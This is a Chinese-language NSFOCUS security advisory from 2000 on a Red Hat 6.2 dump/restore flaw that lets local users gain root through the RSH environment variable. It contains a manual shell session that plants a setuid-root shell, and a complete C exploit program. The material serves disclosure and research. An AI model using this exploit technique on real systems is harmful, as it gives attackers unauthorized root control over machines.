NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

Redhat dump/restore 命令执行任意外部命令漏洞

发布日期：2000-11-02
更新日期：2000-11-03

受影响系统：

  dump-0.4b15-1
    - Red Hat Linux 6.2 （i386, alpha, sparc）
    - Red Hat Linux 6.2EE （i386, alpha, sparc）
    + Red Hat Linux 5.2 （i386, alpha, sparc）

不受影响系统：

dump-0.4b4-11
- RedHat Linux 6.1
dump-0.4b19-4
- RedHat Linux 7

描述：

rpm -qf /sbin/dump，如果是dump-0.4b15-1，该版本的dump/restore命令存在一个
设计上的错误。在做远程备份时，本来应该是/usr/bin/rsh之类的值，由于没有检查
RSH环境变量的有效性，恶意的本地用户可以指定该值为自己编写的shell script，
由于dump/restore是setuid-to-root的，于是该脚本以root身份被执行，进而很容易
获取root权限。

根据NSFOCUS安全小组测试，该漏洞对于RedHat Linux 6.1携带的dump-0.4b4-11无效。

<* 来源：JW Oh (mat@hacksware.com)
Claes Nyberg (md0claes@mdstud.chalmers.se)
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[mat@localhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
[mat@localhost mat]$ /home/mat/sh
bash# id
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)

Claes Nyberg (md0claes@mdstud.chalmers.se)发现restore
也存在同样的问题，并提供了一个测试程序：
-- begin ---
/*
**
**  dump-0.4b15x.c
**
**  dump-0.4b15 exploit:
**  Redhat 6.2 dump command executes
**  external program with suid priviledge.
**
**  affected:
**     /sbin/dump
**     /sbin/dump.static
**     /sbin/restore
**     /sbin/restore.static
**
**  Bug found by mat@hacksware.com
**
**  This example was coded by md0claes@mdstud.chalmers.se
**  It was written for EDUCATIONAL PURPOSES ONLY.
**
**
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RUNME     "/tmp/runme"      /* tmp file */
#define SUID_PATH "/tmp/superdude" /* the power of root */

void usage(char *pname)
{
fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);
fprintf(stdout,   "  d - exploit /sbin/dump\n");
fprintf(stdout,   "  s - exploit /sbin/dump.static\n");
fprintf(stdout,   "  r - exploit /sbin/restore\n");
fprintf(stdout,   "  p - exploit /sbin/restore.static\n\n");
}

int main(int argc, char *argv[], char *envp[])
{
int fd;
pid_t pid;
char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME };
char   runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "
                    SUID_PATH "\nchmod 6755 " SUID_PATH };

char *suid[] = { SUID_PATH, NULL };
char   *av[] = { "/sbin/restore.static", "restore.static",
                  "-t", "/tmp/foo" };

if (argc != 2) {
  usage(argv[0]);
  exit(1);
}

switch(tolower(argv[1][0])) {

  case 'd':
   av[0] = "/sbin/dump";
   av[1] = "dump";
   av[2] = "-0";
   av[3] = "/";
   break;

  case 's':
   av[0] = "/sbin/dump.static";
   av[1] = "dump.static";
   av[2] = "-0";
   av[3] = "/";
   break;

  case 'r':
   av[0] = "/sbin/restore";
   av[1] = "restore";
   break;

  case 'p':
   break;

  default:
   usage(argv[0]);
   exit(1);
}

if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) {
  perror("fopen");
  exit(1);
}

if (write(fd, runbuf, sizeof(runbuf)) == -1) {
  perror("write");
  exit(1);
}
close(fd);

if ((pid = fork()) < 0) {
  perror("fork");
  exit(1);
}

else if (pid == 0) {
  if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
   perror("execle");
   _exit(1);
  }
}

sleep(1);
unlink(RUNME);
fprintf(stdout, "\nExploited %s \n", av[0]);
fprintf(stdout, "Running " SUID_PATH "\n");
execve(SUID_PATH, suid, envp);

exit(0);
}

建议：

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客